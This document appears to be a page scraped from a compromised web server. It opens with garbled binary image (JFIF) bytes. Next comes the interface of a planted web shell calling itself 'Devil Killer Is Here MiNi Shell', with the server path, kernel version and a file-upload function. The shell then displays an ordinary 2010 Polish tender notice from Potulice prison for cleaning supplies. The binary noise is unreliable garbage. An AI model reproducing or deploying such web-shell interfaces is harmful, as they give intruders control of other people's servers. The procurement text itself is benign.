JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100608/145897-N-2010.html

<p class="kh_header"><b>Potulice: Dostawy środków czystości (znak sprawy 12/2010)</b><br>
<b>Numer ogłoszenia: 145897 - 2010; data zamieszczenia: 08.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , Aleja Parkowa 1, 89-120 Potulice, woj. kujawsko-pomorskie, tel. 052 5874440, faks 052 5874400.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy środków czystości (znak sprawy 12/2010).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zamówienie dotyczy dostaw środków czystości, które zostało podzielone na 5 części (grupy).
2.	Ilości szacunkowe środków czystości wyszczególnionych we wszystkich grupach (częściach) mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość poszczególnych środków czystości będzie wynikała z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy.
3.	Termin ważności dostarczanych środków czystości, minimum 6 miesięcy, liczony od dnia dostawy. Dostawa artykułów z krótszym terminem ważności może zostać realizowana po uprzednim uzyskaniu zgody od Zamawiającego.
4.	Zamawiający opisując przedmiot zamówienia podał maksymalną gramaturę, ilość j.m. (np. szt.) w opakowaniu, pojemność albo litraż opakowania, jakie chce uzyskać. W takim przypadku wykonawca może zaoferować artykuł w takim samym opakowaniu lub mniejszym. W przypadku artykułów określonych w pkt 5 (grupa 5) ppkt 1) - Podpaski higieniczne, ppkt 4) - Krem do pielęgnacji dłoni, ppkt 7) - Pasta BHP, ppkt 8) - Proszek do prania wykonawca oferuje artykuł o takiej gramaturze, pojemności (ml) lub szt. w opakowaniu jak w opisie przedmiotu zamówienia. W przypadku artykułu określonego w pkt 5 (grupa 5) ppkt 6) - Środek do dezynfekcji obuwia zamawiający podał minimalną wartość środka w opakowaniu w ml. W przypadku, w którym zamawiający określił przedział (np. w pkt 4 ppkt 32) - ręcznik papierowy) wykonawca oferuje artykuł, którego ilość odpowiada wartości określonej w przedziale.
5.	Jeżeli oferowany artykuł jest w opakowaniu mniejszym niż opakowanie określone przez zamawiającego w formularzu cenowym w kolumnie Przedmiot zamówienia oraz Ilość szacunkowa, to w miejscach wykropkowanych w kolumnie Ilość szacunkowa wykonawca wpisuje taką ilość opakowań (op.), aby ich łączna gramatura, litraż, pojemność lub ilość j.m. (np. szt.) w opakowaniu odpowiadały wartości określonej w nawiasie, w kolumnie Ilość szacunkowa. Jeżeli wykonawca będzie oferował artykuł w opakowaniu, które jest niepodzielne przez ilość całkowitą danego artykułu, podaną w kg, litrach, ml, szt. lub rolek to zaokrągla liczbę opakowań do całości, pod warunkiem, że zaokrąglenie zawsze będzie w górę, np. 10,7 op. = 11 op. lub 10,1 op. = 11 op. Niedopuszczalne jest zaniżanie przez wykonawcę określonej w siwz ilości całkowitej danego artykułu, podanej w litrach, kg, ml, szt. lub rolek.
6.	Jeżeli wykonawca oferuje środek czystości w opakowaniu, którego jednostka miary (j.m.) jest inna niż żądał zamawiający, (np. zamawiający żądał opakowanie w mililitrach, a wykonawca oferuje opakowanie w gramach), wykonawca przelicza j.m. oferowanego opakowania na j.m. opakowania, które żądał zamawiający. W takim przypadku wykonawca załącza do oferty dokument wystawiony przez producenta lub inny uprawniony organ lub podmiot, z którego wynika, jaki jest sposób przeliczania j.m. oferowanego przez wykonawcę opakowania na j.m., jakich żądał zamawiający.
7.	Wykonawca w formularzu cenowym (załącznik nr 1 do siwz) wpisuje nazwę oferowanego artykułu, w kolumnie o takiej samej nazwie, a w kolumnie Przedmiot zamówienia w miejscach wykropkowanych wpisuje gramaturę, litraż, pojemność lub ilość j.m. (np. szt.) w opakowaniu - dotyczy: Grupa 1: poz.: 3-21, Grupa 2: poz. 1-9 i 12, Grupa 3: poz. 1-18, Grupa 4: poz. 8-9, 32-34, Grupa 5: poz. 5-6 i 9.
8.	Wykonawca w formularzu ofertowym (załącznik nr 2 do siwz) w miejscach wykropkowanych wpisuje nazwę firmową oferowanego artykułu, taką samą jak w formularzu cenowym w kolumnie Nazwa oferowanego artykułu oraz inne dane dotyczące danego przedmiotu zamówienia. Ponadto w sposób niebudzący wątpliwości zaznacza odpowiedź TAK/NIE np. poprzez przekreślenie złej odpowiedzi lub podkreślenie właściwej.
9.	Podstawą do zweryfikowania zaproponowanych przez wykonawców środków czystości będą w szczególności dokumenty, określone w siwz w rozdziale IX pkt 3 ppkt 1)-3) oraz wypełniony formularz cenowy i ofertowy (załącznik nr 1 i 2 do siwz).
10.	Miejsce, sposób, terminy dostaw oraz forma i termin płatności..
1)	Wykonawca dostarczać będzie w/w artykuły na swój koszt, własnym transportem, w sposób zapobiegający utracie walorów użytkowych do magazynu Zamawiającego zlokalizowanego w Zakładzie Karnym w Potulicach.
2)	Środki czystości mają być w zamkniętych i nieuszkodzonych opakowaniach, które posiadają nadrukowaną informację o nazwie środka, składzie chemicznym, nazwie i adresie producenta, dacie przydatności do użycia oraz gramaturze/ litrażu/pojemności lub ilości j.m. (np. sztuk) w opakowaniu.
3)	Realizacja dostaw do magazynu w uzgodnionych terminach, w godz. 7:00-15:00.
4)	Termin płatności: 30 dni, forma płatności: przelew..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 33.70.00.00-7, 24.40.00.00-8, 19.52.00.00-7, 39.20.00.00-4, 44.51.41.00-7, 44.31.64.00-2, 39.52.51.00-9, 34.92.84.80-6, 33.69.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do siwz)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do siwz)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do siwz)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do siwz)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do siwz)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.	aktualne karty charakterystyki lub atesty, lub świadectwa wystawione przez Państwowy Zakład Higieny (PZH), lub inny uprawniony organ albo podmiot, na oferowane środki czystości - dotyczy artykułów wymienionych w rozdziale III pkt 1 (grupa 1) ppkt: 1) - 21), pkt 2 (grupa 2) ppkt: 1)-12), pkt 3 (grupa 3) ppkt: 1)-18), pkt 5 (grupa 5) ppkt 3)-9);

2.	aktualny atest lub inny dokument wystawiony przez Państwowy Zakład Higieny (PZH) lub inny uprawniony organ albo podmiot, z którego wynika, że artykuł jest dopuszczony do obrotu handlowego i stosowania zgodnie z przeznaczeniem - dotyczy artykułów wymienionych w rozdziale III pkt 4 (grupa 4) ppkt 8), 9) i 34), pkt 5 (grupa 5) ppkt: 1), 2), 4), 6)-9);
3.	aktualne pozwolenie lub decyzję wydaną przez uprawniony organ na podstawie art. 4 ust. 1 lub art. 54 ust. 1 ustawy z dnia 13 września o produktach biobójczych (Dz. U. Nr 175, poz. 1433 z późn. zm.), dotyczącą pozwolenia na obrót produktem biobójczym - dotyczy artykułów wymienionych w rozdziale III pkt 1 (grupa 1) ppkt: 3), 16), 17) i 21), pkt 2 (grupa 2) ppkt 9), pkt 3 (grupa 3) ppkt: 1), 2), 4)-13) i 15), pkt 5 (grupa 5) ppkt: 3) i 6)</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§ 4.
1.	Strony ustalają, że treść umowy może ulec zmianie zgodnie z art. 144 ustawy Prawo zamówień publicznych (Dz. U. z 2007r. Nr 223, poz. 1655, z 2008r. Nr 171, poz. 1058, Nr 220, poz. 1420 i Nr 227, poz. 1505 oraz z 2009r. Nr 19, poz. 101, Nr 65, poz. 545 i Nr 91, poz. 742, Nr 157, poz. 1241, Nr 206, poz. 1591, Nr 223, poz. 1778).
2.	Zmiany postanowień niniejszej umowy mogą dotyczyć w szczególności:
1)	nazwy, adresu oraz osób reprezentujących strony, a także osób wymienionych w § 6 pkt 1 i/lub pkt 2;
2)	cen artykułów wymienionych w załączniku nr 1 do umowy, o kwotę nie większą niż wynikającą ze wskaźnika cen towarów i usług konsumpcyjnych, podanego przez GUS publikowanego w Monitorze Polskim. Wskaźnik cen towarów i usług konsumpcyjnych liczony jest miesięcznie od terminu obowiązywania umowy, o którym mowa w § 2 pkt 1;
3)	urzędowej stawki podatku VAT na artykuły wymienione w załączniku nr 1 do umowy;
4)	każdej zmiany, która jest korzystna lub neutralna dla zamawiającego, lub zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego;
5)	terminu zakończenia (przedłużenia) obowiązywania niniejszej umowy, o którym mowa w § 2 pkt 1, z zastrzeżeniem § 3 pkt 3.
3.	Zmiany postanowień niniejszej umowy wymagają potwierdzenia pisemnego w postaci aneksu, z zastrzeżeniem pkt 5.
4.	Strona wnioskująca o zmianę postanowień niniejszej umowy niezwłocznie i pisemnie powiadamia o tym fakcie drugą stronę, uzasadniając zmianę okolicznościami faktycznymi i prawnymi oraz przedkłada propozycję aneksu do umowy.
5.	Strony dopuszczają możliwość okresowych dostaw artykułów po cenie niższej niż określonej w załączniku nr 1 do umowy (tzw. promocja). Zmiany te nie wymagają potwierdzenia pisemnego w postaci aneksu do umowy.
6.	Wykonawca nie podwyższa cen artykułów wymienionych w załączniku nr 1 do umowy, w okresie 3 miesięcy od dnia obowiązywania umowy, o którym mowa w § 2 pkt 1.
7.	Zmiana postanowień niniejszej umowy na podstawie pkt 2 ppkt 2 nie może następować częściej niż raz na kwartał.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny, Aleja Parkowa 1, 89-120 Potulice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2010 godzina 11:00, miejsce: w siedzibie zamawiającego, w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> grupa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Kostka zapachowa do WC z koszykiem, ilość szacunkowa - 300 szt. CPV: 39831600-2.
b)	Higieniczne tabletki do pisuarów, ilość szacunkowa - 300 szt. CPV: 39831600-2.
c)	Płyn do mycia WC, w opakowaniu do 1000 ml, ilość szacunkowa - 150 op. po 1000ml (łącznie 150 litrów). CPV: 39831600-2.
d)	Mydło w płynie w opakowaniu do 5 litrów, ilość szacunkowa - 60 op. po 5 litrów (łącznie 300 litrów). CPV: 33711900-6.
e)	Proszek do prania białego w opakowaniu do 5 kg netto, ilość szacunkowa - 10 op. po 5 kg (łącznie 50 kg). CPV: 39831000-6.
f)	Proszek do prania kolor w opakowaniu do 5 kg netto, ilość szacunkowa - 6 op. po 5 kg (łącznie 30 kg). CPV: 39831000-6.
g)	Odplamiacz w płynie w opakowaniu do 1000 ml, ilość szacunkowa - 12 op. po 1000 ml (łącznie 12 litrów). CPV: 39830000-9.
h)	Płyn do mycia szyb - spryskiwacz, w opakowaniu do 1000 ml, ilość szacunkowa - 150 op. po 1000 ml (łącznie 150 litrów). CPV: 39830000-9.
i)	Płyn uniwersalny do mycia podłóg, w opakowaniu do 1000 ml, ilość szacunkowa - 400 op. po 1000 ml (łącznie 400 litrów). CPV: 39831300-9.
j)	Płyn do pielęgnacji podłóg, w opakowaniu do 1000 ml, ilość szacunkowa - 80 op. po 1000 ml (łącznie 80 litrów). CPV: 39831300-9.
k)	Emulsja do podłóg, w opakowaniu do 5 litrów, ilość szacunkowa - 500 op. po 5 litrów (łącznie 2500 litrów). CPV: 39831300-9.
l)	Płyn do usuwania kamienia i rdzy, w opakowaniu do 1000 ml, ilość szacunkowa - 100 op. po 1000 ml (łącznie 100 litrów). CPV: 39830000-9.
m)	Środek do konserwacji stali, w opakowaniu do 1000 ml, ilość szacunkowa - 50 op. po 1000ml (łącznie 50 litrów). CPV: 39830000-9.
n)	Pianka do czyszczenia mebli w aerozolu, w opakowaniu do 500 ml, ilość szacunkowa - 100 op. po 500 ml (łącznie 50 litrów). CPV: 39833000-0.
o)	Odświeżacz powietrza w aerozolu, w opakowaniu do 500 ml, ilość szacunkowa - 30 op. po 500 ml (łącznie 15 litrów). CPV: 39811100-1.
p)	Środek owadobójczy w aerozolu w opakowaniu do 500 ml, ilość szacunkowa - 60 op. po 500 ml (łącznie 30 litrów). CPV: 33691000-0.
q)	Środek przeciw pleśni - rozpylacz, w opakowaniu do 1000 ml, ilość szacunkowa - 40 op. po 1000 ml (łącznie 40 litrów). CPV: 24457000-2.
r)	Płyn do mycia naczyń, w opakowaniu do 10 litrów, ilość szacunkowa - 250 op. po 10 litrów (łącznie 2500 litrów). CPV: 39832000-3.
s)	Proszek do czyszczenia, w opakowaniu do 1000g netto, ilość szacunkowa - 2000 op. po 1000 g (łącznie 2000kg). CPV: 39830000-9.
t)	Mleczko do czyszczenia urządzeń kuchennych i sanitarnych, w opakowaniu do 1000 ml, ilość szacunkowa - 50 op. po 1000 ml (łącznie 50 litrów). CPV: 39830000-9.
u)	Płyn do dezynfekcji, w opakowaniu do 5 litrów, ilość szacunkowa - 60 op. po 5 litrów (łącznie 300 litrów). CPV: 39830000-9.

Szczegółowy opis przedmiotów zamówienia znajduje się w siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.16.00-2, 33.71.19.00-6, 39.83.10.00-6, 39.83.00.00-9, 39.83.30.00-0, 39.81.11.00-1, 33.69.10.00-0, 24.45.70.00-2, 39.83.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> grupa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Środek do maszynowego mycia naczyń, w opakowaniu do 15 kg netto, ilość szacunkowa - 17 op. po 15kg (łącznie 255 kg). CPV: 39832000-3. PN-EN-1276:2000/Ap1:2001.
b)	Płyn do maszynowego jednocyklowego nabłyszczania naczyń, w opakowaniu do 10 litrów, ilość szacunkowa - 25 op. po 10 litrów (łącznie 250 litrów). CPV: 39832000-3. 
c)	Płyn do usuwania osadów mineralnych, w opakowaniu do 10 litrów, ilość szacunkowa - 33 op. po 10 litrów (łącznie 330 litrów). CPV: 39830000-9.
d)	Proszek do szorowania zawierający aktywny tlen, w opakowaniu do 10 kg netto, ilość szacunkowa - 32 op. po 10kg (łącznie 320 kg). CPV: 39813000-4.
e)	Środek do mycia i konserwacji powierzchni ze stali szlachetnej, w opakowaniu do 1000 ml, ilość szacunkowa - 160 op. po 1000ml (łącznie 160 litrów). CPV: 39830000-9.
